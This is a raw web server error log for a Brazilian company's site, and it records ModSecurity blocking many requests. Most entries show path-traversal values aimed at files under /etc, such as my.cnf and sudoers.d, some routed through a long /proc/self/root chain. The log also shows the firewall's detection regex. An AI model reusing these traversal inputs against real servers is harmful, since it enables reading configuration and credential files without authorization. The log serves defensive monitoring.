https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:07.604414 2026] [:error] [pid 11642:tid 140411641214720] [client 57.141.18.31:45730] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1iI7ninkcc-iUj5AqRUQAAA4w"]
[Fri Mar 20 12:05:08.211152 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:50742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iJPXLqtnMIWvjpaLR0gAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:10.673550 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.241.31:50754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iJl1pVZ5mVmJwsFNi-wAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:14.256477 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:50760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iKvXLqtnMIWvjpaLR2QAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:17.824416 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.241.31:50766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iLTJ3M9BSuKP7CAZeLAAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:20.046707 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.241.31:38382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iL_HIg5MgXLBnicMqBAAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:22.451925 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:38396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iMvqxLDW4GITHUkQf5AAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:24.786967 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.241.31:38410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iNDJ3M9BSuKP7CAZeLwAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:26.192854 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:38426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iNjJ3M9BSuKP7CAZeMgAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:27.646544 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:42222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iN_XLqtnMIWvjpaLR5AAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:28.986926 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:42236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iOAF0L0L-SsrnPo6dzAAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:39.080476 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.241.31:42238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iQ7ninkcc-iUj5AqRYwAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:41.593548 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.241.31:45140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iRV1pVZ5mVmJwsFNjCAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:42.883238 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.241.31:45144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iRrninkcc-iUj5AqRaQAAA5Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:44.203563 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.241.31:45148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iSLninkcc-iUj5AqRbQAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:45.532377 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.241.31:45164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iSfqxLDW4GITHUkQf7gAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:48.912979 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:45174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iTPXLqtnMIWvjpaLR7gAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:05:52.676208 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.241.31:42284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1iTwF0L0L-SsrnPo6d2QAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:06:03.727917 2026] [:error] [pid 31215:tid 140411582465792] [client 57.141.18.26:47272] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1iWwF0L0L-SsrnPo6d4QAAAtM"]
[Fri Mar 20 12:06:03.903191 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.244.43:42146] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1iW7ninkcc-iUj5AqReAAAA4s"]
[Fri Mar 20 12:06:07.379742 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.84:47386] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1iX-oXxyEfFpUF8f-07QAAAU4"]
[Fri Mar 20 12:06:10.517223 2026] [mime_magic:error] [pid 21219:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:47482] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:06:10.517760 2026] [mime_magic:error] [pid 9818:tid 140411683178240] (70014)End of file found: [client 57.141.18.22:47480] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:06:14.645780 2026] [mime_magic:error] [pid 15826:tid 140411683178240] (70014)End of file found: [client 57.141.18.107:47582] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:06:17.990706 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.44:47426] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1iaTJ3M9BSuKP7CAZeZQAAAJQ"]
[Fri Mar 20 12:06:31.271381 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.241.31:39550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1idvHIg5MgXLBnicMqJwAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
